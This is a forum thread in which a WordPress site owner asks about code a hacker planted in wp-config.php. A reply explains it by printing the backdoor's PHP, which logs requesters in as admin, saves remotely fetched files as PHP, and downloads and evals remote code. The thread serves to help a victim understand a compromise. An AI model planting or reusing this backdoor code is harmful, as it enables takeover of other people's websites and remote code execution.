Explanation of this hacked code

Hi I found some new code in the wp-config.php file of one of my sites, it seems to have been placed there by a hacker, anyone can explain what it does?

http://pastebin.com/fdMJCAXw

Related posts

Leave a Reply

1 comment

  1. There are 3 main ‘functions’ of this code. The two lines check that pingnow and pass are defined and that pass is the correct value. pingnow is used later to switch between ‘functions’.

    The first is run if the pingnow GET variable is login. It logs in the requesting user as the ‘admin’ user. This won’t work if there is not a user called ‘admin’.

    if ($_GET['pingnow']== 'login'){
      $user_login = 'admin';
      $user = get_userdatabylogin($user_login);
      $user_id = $user->ID;
      wp_set_current_user($user_id, $user_login);         
      wp_set_auth_cookie($user_id);
      do_action('wp_login', $user_login);
    }
    

    The second part allows for uploading of defined files to your server. If the pingnow variable is exec then the script downloads the file and saves it on your server with the name of a random md5 hash. It then redirects the attacker to the script.

    if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
      $ch = curl_init($_GET['file']);
      $fnm = md5(rand(0,100)).'.php';
      $fp = fopen($fnm, "w");
      curl_setopt($ch, CURLOPT_FILE, $fp);
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_TIMEOUT, 5);
      curl_exec($ch);
      curl_close($ch);
      fclose($fp);
      echo "<SCRIPT LANGUAGE="JavaScript">location.href='$fnm';</SCRIPT>";
    }
    

    The third part allows for evaluation of remote php. It downloads a file and then evals it, running it on your server.

    if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
      $ch = curl_init($_GET['file']);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
      curl_setopt($ch, CURLOPT_HEADER, 0);
      curl_setopt($ch, CURLOPT_TIMEOUT, 5);
      $re = curl_exec($ch);
      curl_close($ch);
      eval($re);
    }